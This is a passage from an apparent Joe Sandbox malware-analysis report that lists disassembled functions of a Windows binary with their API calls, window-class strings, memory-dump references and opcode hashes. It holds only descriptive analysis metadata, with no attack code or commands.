                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                      • String ID: REMOVE$THIS
                                                                                                                      • API String ID: 2528338962-776492005
                                                                                                                      • Opcode ID: 9cfffb534ac3d68cf232e02a88e3e8908a1ba4065aa98dd6a8e4e8f57f2f3667
                                                                                                                      • Instruction ID: efe77971b2c6dcba806fe5036fafae6711b4ea5757aa2b1ef56b229401ac6690
                                                                                                                      • Opcode Fuzzy Hash: 9cfffb534ac3d68cf232e02a88e3e8908a1ba4065aa98dd6a8e4e8f57f2f3667
                                                                                                                      • Instruction Fuzzy Hash: 1C41B135A006599FCF12DF56C881BAEB7B5FF49308F048169E916AF392DB349D41CB40
                                                                                                                      Function 0040A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0043DBF0,00000000,?,?,?,?), ref: 0040A4E6
                                                                                                                      • GetWindowLongW.USER32 ref: 0040A503
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040A513
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long
                                                                                                                      • String ID: SysTreeView32
                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                      • Opcode ID: 93fd0c0189f580e20fe8bc6bee1cc7a343c3fbff5cf10bffe3f0d61bca885669
                                                                                                                      • Instruction ID: 69759ad8bf515f582cb089bd6e811a52c903e10310ff7f721fad8bc8d5d82ba2
                                                                                                                      • Opcode Fuzzy Hash: 93fd0c0189f580e20fe8bc6bee1cc7a343c3fbff5cf10bffe3f0d61bca885669
                                                                                                                      • Instruction Fuzzy Hash: 5131E035600605AFDB219E38CC45BEB7B69FF49328F244726F875A32E0C738E8619B55
                                                                                                                      Function 003F57D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003F57E7
                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003F581D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                      • String ID: ?K?$|
                                                                                                                      • API String ID: 1413715105-774535530
                                                                                                                      • Opcode ID: 61e36b1cc1e69e7586ee62f550338ba3b78fbd3a46b66435daab226b6a8f19ea
                                                                                                                      • Instruction ID: a6a1917f70fa08e51eaff2a79b1e98e9f0aae5b97e33383edea8b32fd635ce0f
                                                                                                                      • Opcode Fuzzy Hash: 61e36b1cc1e69e7586ee62f550338ba3b78fbd3a46b66435daab226b6a8f19ea
                                                                                                                      • Instruction Fuzzy Hash: 0E310C72900119ABCF12EFA0DC55EEE7FB9FF19350F104019F915AA162DB319946DB60
                                                                                                                      Function 0040A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0040A74F
                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0040A75D
                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0040A764
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                      • String ID: msctls_updown32
                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                      • Opcode ID: e6d79901d1925ce0e4af564880e6d0ad3a15064a8b04efe2111d5ab716bfbbfe
                                                                                                                      • Instruction ID: d122476455b23532a13dbbc6403fa001a61021b38af8f04b7a6ae2d5e206123b
                                                                                                                      • Opcode Fuzzy Hash: e6d79901d1925ce0e4af564880e6d0ad3a15064a8b04efe2111d5ab716bfbbfe
                                                                                                                      • Instruction Fuzzy Hash: FE21B575600205AFDB11EF24CCC1EA737BDEB49394B08442AF901AB3A1C775EC21CB65
                                                                                                                      Function 004097B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0040983D
                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0040984D
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00409872
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                      • String ID: Listbox
                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                      • Opcode ID: 9e88a7cbb1d5aedba77fe8edbb20df0f0c054197f1196105783861d38e228abb
                                                                                                                      • Instruction ID: 950dcf74c4dd5a9dcf9574e428fa116a57d605f57c48a65884087f44885656b3
                                                                                                                      • Opcode Fuzzy Hash: 9e88a7cbb1d5aedba77fe8edbb20df0f0c054197f1196105783861d38e228abb
                                                                                                                      • Instruction Fuzzy Hash: E0210732620118BFDF219F54CC85FAB3BAAEF89754F018135F9046B2D1C6759C529BA4
                                                                                                                      Function 003DC39D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003DC3BF
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003DC3D6
                                                                                                                      • SendMessageW.USER32(?,0000000D,?,00000000), ref: 003DC40E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: b520ba0d0c355b84d7bad76e263af8e8d2d9d977031c9a1f6e1e846a32b786ff
                                                                                                                      • Instruction ID: 839757cfc48f7a373e381e1a4a63ebe56d68989a10385d4bc112674387363652
                                                                                                                      • Opcode Fuzzy Hash: b520ba0d0c355b84d7bad76e263af8e8d2d9d977031c9a1f6e1e846a32b786ff
                                                                                                                      • Instruction Fuzzy Hash: 64219232A24119BBDB16DBADD842DAEF7BEEF44310F115456E405E3250D671AE01CA94
                                                                                                                      Function 003F8D31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000402,00000000,00000000), ref: 003F8D80
                                                                                                                      • SendMessageW.USER32(0000000C,00000000,?), ref: 003F8DC1
                                                                                                                      • SendMessageW.USER32(0000000C,00000000,?), ref: 003F8DE9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3850602802-2594219639
                                                                                                                      • Opcode ID: e8216cdd1272b65cac0e47e4f23fa9b9f391fbe134d8617f21166d2d73554ed6
                                                                                                                      • Instruction ID: 2414438fbdec7314584061775bfc094cf5ccf06a4fb15b19d7c4f85b226792da
                                                                                                                      • Opcode Fuzzy Hash: e8216cdd1272b65cac0e47e4f23fa9b9f391fbe134d8617f21166d2d73554ed6
                                                                                                                      • Instruction Fuzzy Hash: 44218975200501AFDB16EB14DD85D2ABBEAFF4A310B058161F9089B6B1DB30FC50CB94
                                                                                                                      Function 0040A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0040A27B
                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0040A290
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0040A29D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                      • Opcode ID: 24edca9f387f08cad18cd6fb9e9b9c4b05f82166074a2733cc21972efbf5c044
                                                                                                                      • Instruction ID: 7f68f4e2c8eb64450ba3b96958eb154d5e549b3606309dda6289f46839717c98
                                                                                                                      • Opcode Fuzzy Hash: 24edca9f387f08cad18cd6fb9e9b9c4b05f82166074a2733cc21972efbf5c044
                                                                                                                      • Instruction Fuzzy Hash: 55112371200308BAEB205F61CC06FE73BA8EF88B18F01413DFA41A62D0D276A861DB64
                                                                                                                      Function 00409424 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 004094A6
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004094B5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                      • String ID: @U=u$edit
                                                                                                                      • API String ID: 2978978980-590756393
                                                                                                                      • Opcode ID: a2872b7cf05b2ab9a45c449f8068bae3d2abeed1b7b50fab8d5b564e3dc81241
                                                                                                                      • Instruction ID: 1078216cfecc22f31041fd2c37e7f0e76ca01369795f2a73b2e1abc8f6b264b3
                                                                                                                      • Opcode Fuzzy Hash: a2872b7cf05b2ab9a45c449f8068bae3d2abeed1b7b50fab8d5b564e3dc81241
                                                                                                                      • Instruction Fuzzy Hash: B111BF71504204AFEB109E64DC81EEB3769EF04378F504736F965A32E1C379DC529B69
                                                                                                                      Function 003DC577 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003DC5E5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 1456604079-2258501812
                                                                                                                      • Opcode ID: 9b09d23e79e2a79de52576f683a1c38926688a7c107acf25123a5a19fa375a6a
                                                                                                                      • Instruction ID: 6067af0971d28b75cefd8405e722ab26031ae6ef846e40489bce1c953d88335b
                                                                                                                      • Opcode Fuzzy Hash: 9b09d23e79e2a79de52576f683a1c38926688a7c107acf25123a5a19fa375a6a
                                                                                                                      • Instruction Fuzzy Hash: E201B572661119ABCB06EB64EC519FE776AAB43310714071AF432EB3D1DA746908D750
                                                                                                                      Function 003DC473 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 003DC4E1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 1456604079-2258501812
                                                                                                                      • Opcode ID: fb33c3f3e8df8ebf57a8f2d13a09380ccaea7c34aed07383266d5b9becc5512c
                                                                                                                      • Instruction ID: a39ce1f5e34a1eba8fe71d7668c528e958448c267ad381ebe38f6697292566c0
                                                                                                                      • Opcode Fuzzy Hash: fb33c3f3e8df8ebf57a8f2d13a09380ccaea7c34aed07383266d5b9becc5512c
                                                                                                                      • Instruction Fuzzy Hash: 6701F772A611096BCB07EBA0D962EFF33BC9F02300F140016F903EB2C1DA545E09D6A1
                                                                                                                      Function 003DC4F6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 003DC562
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 1456604079-2258501812
                                                                                                                      • Opcode ID: 252478487e7f0bf6614a018a47bd901b468784212dbab31d1853e6e2c9b922de
                                                                                                                      • Instruction ID: 7811b855b63fd1d1b33de61d860eed34142f4d8637c197d1dba93c9a5f19e254
                                                                                                                      • Opcode Fuzzy Hash: 252478487e7f0bf6614a018a47bd901b468784212dbab31d1853e6e2c9b922de
                                                                                                                      • Instruction Fuzzy Hash: E501F276A601096BCB02EBA4E902EFF73AD9B02701F240116F403E72C2DA549E0992A1
                                                                                                                      Function 0040D784 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(?,00461810,00410327,000000FC,?,00000000,00000000,?,?,?,0041F381,?,?,?,?,?), ref: 0040D786
                                                                                                                      • GetFocus.USER32 ref: 0040D78E
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 0040D800
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3601265619-2594219639
                                                                                                                      • Opcode ID: 3b1c2c556a54166cc91e753065510340bcb006578e6bffacf7b1b972711a1c32
                                                                                                                      • Instruction ID: 6e45b818e9cfc2f92c86ff7eac2f7e667c222984f4a6157aebf616357a625190
                                                                                                                      • Opcode Fuzzy Hash: 3b1c2c556a54166cc91e753065510340bcb006578e6bffacf7b1b972711a1c32
                                                                                                                      • Instruction Fuzzy Hash: 22017932A005008FC725AF28DC85AA67BE6BB89314F18427AE525D73F1EB35AC16CB55
                                                                                                                      Function 003A1A85 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003A1952
                                                                                                                      • SendMessageW.USER32(?,0000000C,00000000,?), ref: 003A1AA1
                                                                                                                      • GetParent.USER32(?), ref: 00412528
                                                                                                                      • InvalidateRect.USER32(00000000,?,003A1A74,?,00000000,00000001), ref: 0041252F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
